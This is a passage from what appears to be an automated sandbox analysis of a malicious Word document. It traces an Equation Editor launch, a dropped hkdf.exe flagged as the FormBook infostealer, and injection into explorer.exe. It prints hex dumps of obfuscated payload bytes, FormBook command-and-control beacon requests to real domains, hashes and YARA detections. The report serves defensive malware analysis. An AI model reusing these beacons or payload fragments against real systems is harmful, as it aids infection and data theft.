Dec 15, 2021 14:47:52.195796013 CET	6	IN	Data Raw: 91 dd 5a 20 9d e9 fb 5f 61 38 91 f8 ff ff 02 7b 02 00 00 04 1a 6f 2b 00 00 0a 06 20 c1 e3 00 ce 5a 20 5c 77 6c 87 61 38 73 f8 ff ff 02 7b 04 00 00 04 20 f4 00 00 00 1f 12 73 25 00 00 0a 6f 26 00 00 0a 06 20 ff a4 eb 62 5a 20 70 ea b2 50 61 38 4a Data Ascii: Z _a8{o+ Z \wla8s{ s%o& bZ pPa8J 1Z KWxZa87{rpo# C>Z %_a8 Z @}a8{qs%o& F+AZ ya8{Ks)o* VZ a8 DZ
Dec 15, 2021 14:47:52.195835114 CET	7	IN	Data Raw: 00 00 0a 6f 2a 00 00 0a 00 06 20 0c c4 f9 50 5a 20 63 73 f7 a1 61 38 4a f3 ff ff 02 28 27 00 00 0a 02 7b 08 00 00 04 6f 28 00 00 0a 06 20 cd 65 06 35 5a 20 94 5c 6c eb 61 38 27 f3 ff ff 00 02 17 28 38 00 00 0a 00 02 20 50 01 00 00 20 b5 00 00 00 Data Ascii: o* PZ csa8J('{o( e5Z \la8'(8 P s)(9 QtZ qa8 I>Z Ya8 JhZ $]a8{rApo# 4Z +Ua8{Qs)o zlZ 6ma8('{o(
Dec 15, 2021 14:47:52.195874929 CET	8	IN	Data Raw: d7 61 38 e4 fe ff ff 17 13 07 20 2a c2 44 bf 38 d7 fe ff ff 00 02 7b 11 00 00 04 72 7d 01 00 70 6f 31 00 00 0a 20 d4 5d e5 f0 38 bc fe ff ff 11 06 2d 08 20 72 6a 45 57 25 2b 06 20 46 f7 fb 28 25 26 11 08 20 e8 16 9b 2e 5a 61 38 9b fe ff ff 07 16 Data Ascii: a8 *D8{r}po1 ]8- rjEW%+ F(%& .Za8+- :S}%+ k2%&8ydZXdZXZZo? vNZ tna8Ke[~(@9 qEZ \|$a8"dZXdZXdXZYdXZYoA
Dec 15, 2021 14:47:52.195929050 CET	10	IN	Data Raw: 61 02 00 00 11 06 20 07 0d aa 6b 5a 20 14 03 07 84 61 38 06 ff ff ff 11 06 20 77 89 ea b4 5a 20 4f 59 7d dd 61 38 f3 fe ff ff 02 7b 10 00 00 04 6f 47 00 00 0a 0a 28 48 00 00 0a 22 00 00 00 40 73 46 00 00 0a 0b 20 04 b5 af 46 38 cd fe ff ff 08 2d Data Ascii: a kZ a8 wZ OY}a8{oG(H"@sF F8- h%+ q%& _5Za8~ cI&Z -a8 $Z ^a8 UZ 8a8m icaZ D-a8Y( wZ p0a8@- T<B%+ 6C%&
Dec 15, 2021 14:47:52.195965052 CET	11	IN	Data Raw: 09 00 00 06 00 11 05 20 7a 5d 5c 9c 5a 20 bc c2 cd 9e 61 2b 82 02 7e 92 00 00 04 28 0a 00 00 06 11 05 20 cd b5 d3 7c 5a 20 14 07 52 d2 61 38 64 ff ff ff 00 11 05 20 15 39 3c cc 5a 20 c3 41 3e d0 61 38 50 ff ff ff 02 04 6f 4a 00 00 0a 04 6f 4b 00 Data Ascii: z]\Z a+~( \|Z Ra8d 9<Z A>a8PoJoK~( 7eZ Wa8%~- x%+ k%&8, =%+ 3.X%& hZa8~_ *hU8~ 2Z a8~_, uV%+
Dec 15, 2021 14:47:52.196005106 CET	13	IN	Data Raw: 6d 5a 20 60 40 e6 0e 61 38 a4 fd ff ff 11 05 1b 1f 61 9d 11 05 1c 1f 63 9d 11 05 1d 1f 5f 9d 11 05 1e 1f 74 9d 11 05 1f 09 1f 6f 9d 11 0b 20 bd 4a fc f1 5a 20 57 0f 92 da 61 38 72 fd ff ff 00 02 7b 13 00 00 04 17 6f 20 00 00 0a 00 11 0b 20 23 c0 Data Ascii: mZ `@a8ac_to JZ Wa8r{o #Z a8Q{o0{s3oN `Z %a8 KZ nna8 DZ :a8{o+{rpo1 &Z JAxa8
Dec 15, 2021 14:47:52.196047068 CET	14	IN	Data Raw: ff 02 7b 14 00 00 04 20 44 01 00 00 1f 40 73 25 00 00 0a 6f 26 00 00 0a 00 11 0b 20 6e 29 d1 4c 5a 20 e5 ca 02 28 61 38 4b f8 ff ff 07 11 08 d2 6f 5c 00 00 0a 00 11 0b 20 d6 8d 3b 80 5a 20 59 24 ec 05 61 38 2e f8 ff ff 02 28 27 00 00 0a 02 7b 12 Data Ascii: { D@s%o& n)LZ (a8Ko\ ;Z Y$a8.('{o( HCZ ha8 Z a8{o+ BZ /a8{o { D)s%o& pKZ a8{rpo# !Z %
Dec 15, 2021 14:47:52.221541882 CET	16	IN	Data Raw: 00 00 00 0a 00 00 11 00 20 b9 55 e0 02 20 2c 8d 0f 54 61 25 0b 1a 5e 45 04 00 00 00 18 00 00 00 02 00 00 00 27 00 00 00 dc ff ff ff 2b 25 02 28 60 00 00 0a 0a 07 20 1e 91 70 6b 5a 20 ce 38 b6 2a 61 2b c9 07 20 b8 56 eb a1 5a 20 5a 69 4e ef 61 2b Data Ascii: U ,Ta%^E'+%(` pkZ 8a+ VZ ZiNa+0oa0= fvj Na%^E+ob Z 1a+0B}((!({oc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49166	104.21.53.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:48:56.604588985 CET	1105	OUT	GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=CkbDaw0w78FnUUGmsS8khblO1m9LoxhjWgnULl67DqIIYbf1Mw49JamKO+kmV1m+rdKGzg== HTTP/1.1 Host: www.ridvanyilmaz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:48:56.972049952 CET	1106	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Dec 2021 13:48:56 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y1l53AotGcaBdB6ndd0Kg3%2FU1Nhm58nM7foSwt2bDRM6lh86euEL5eTagQby4tg0gjDnQCkuVS0Ev1fj0yJVc82y15BG%2BQgEPZlP%2FGSs7bC0QFiwRLHapNkzrodaEFYEFSMFRkSaeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6be021e5dce20621-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 69 64 76 61 6e 79 69 6c 6d 61 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.ridvanyilmaz.com Port 80</address></body></html>
Dec 15, 2021 14:48:56.972099066 CET	1106	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49167	167.99.163.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:02.285063982 CET	1106	OUT	GET /b62n/?VrxdA6JP=pEQZAUdavhsqZJkN83QQx5vUzCZ7bVbXRO/iD/+E6RM5nTIKuIu5/L5eTQ9xaMo7/J5LQA==&7ng=k0GpdJo86r2 HTTP/1.1 Host: www.atlasconcretos.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:02.500628948 CET	1108	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Dec 2021 13:49:02 GMT Server: Apache Last-Modified: Mon, 13 Sep 2021 23:53:44 GMT ETag: "328-5cbe92ce033f6" Accept-Ranges: bytes Content-Length: 808 X-Powered-By: PleskLin Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49168	109.71.253.24	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:16.181895971 CET	1109	OUT	GET /b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2 HTTP/1.1 Host: www.digitize-vision.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:16.199150085 CET	1109	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 15 Dec 2021 13:49:16 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.digitize-vision.com/b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49169	3.19.116.195	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:34.239461899 CET	1111	OUT	GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=Ry9//1u1KSBgvJVTMKtsoBLsTLEtS61U1s5lXOGkeFjYXUCmgqEi+s/kbRLZIKsosKg42g== HTTP/1.1 Host: www.bagways.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:34.386954069 CET	1111	IN	HTTP/1.1 302 Found Server: nginx/1.21.4 Date: Wed, 15 Dec 2021 13:49:34 GMT Content-Length: 0 Connection: close Location: https://www.hugedomains.com/domain_profile.cfm?d=bagways&e=com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49171	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:39.446408987 CET	1112	OUT	GET /b62n/?VrxdA6JP=4vMzR1O6TdRvdnjwNsxZKAWsXyEcarJE8V5Wgs9HzMhC/KpAuLZfktwaHjQNhKT+WAJJHA==&7ng=k0GpdJo86r2 HTTP/1.1 Host: www.xn--growbb-fvab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:39.561285973 CET	1112	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 15 Dec 2021 13:49:39 GMT Content-Type: text/html Content-Length: 275 ETag: "6192576d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.22	49172	147.124.221.147	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:44.886116982 CET	1113	OUT	GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=zigQYQl5UzFlMNnRx6FEMCOrGb7IataJR35zF0KDFEJa6c5GJb0linXPwXtb/lrtaJB0WA== HTTP/1.1 Host: www.multidetoxhepatico.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:45.727921963 CET	1114	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 15 Dec 2021 13:49:44 GMT Server: Apache X-UA-Compatible: IE=edge Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://multidetoxhepatico.com/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=zigQYQl5UzFlMNnRx6FEMCOrGb7IataJR35zF0KDFEJa6c5GJb0linXPwXtb/lrtaJB0WA== Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.22	49173	75.2.60.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:50.799089909 CET	1114	OUT	GET /b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2 HTTP/1.1 Host: www.ktieman.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:51.098380089 CET	1115	IN	HTTP/1.1 301 Moved Permanently cache-control: public, max-age=0, must-revalidate content-length: 44 content-type: text/plain date: Fri, 10 Dec 2021 09:20:25 GMT x-nf-request-id: 01FPZ5PG143CKVB47SXXD02D3V location: https://www.ktieman.com/b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2 server: Netlify age: 448166 Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 74 69 65 6d 61 6e 2e 63 6f 6d 2f 62 36 32 6e 2f Data Ascii: Redirecting to https://www.ktieman.com/b62n/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49174	23.225.139.107	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 15, 2021 14:49:56.325464010 CET	1116	OUT	GET /b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ== HTTP/1.1 Host: www.ff4c2myy0.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 15, 2021 14:49:56.513045073 CET	1116	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Dec 2021 13:49:57 GMT Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 788 Parent PID: 596

General

Start time:	14:47:16
Start date:	15/12/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f6c0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2420 Parent PID: 596

General

Start time:	14:47:17
Start date:	15/12/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: hkdf.exe PID: 3004 Parent PID: 2420

General

Start time:	14:47:19
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Roaming\hkdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hkdf.exe
Imagebase:	0x13e0000
File size:	1041408 bytes
MD5 hash:	14E865F28F1A02890383D2EC6638E6F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: hkdf.exe PID: 516 Parent PID: 3004

General

Start time:	14:47:23
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Roaming\hkdf.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\hkdf.exe
Imagebase:	0x13e0000
File size:	1041408 bytes
MD5 hash:	14E865F28F1A02890383D2EC6638E6F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: hkdf.exe PID: 2832 Parent PID: 3004

General

Start time:	14:47:24
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Roaming\hkdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hkdf.exe
Imagebase:	0x13e0000
File size:	1041408 bytes
MD5 hash:	14E865F28F1A02890383D2EC6638E6F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1764 Parent PID: 2832

General

Start time:	14:47:27
Start date:	15/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
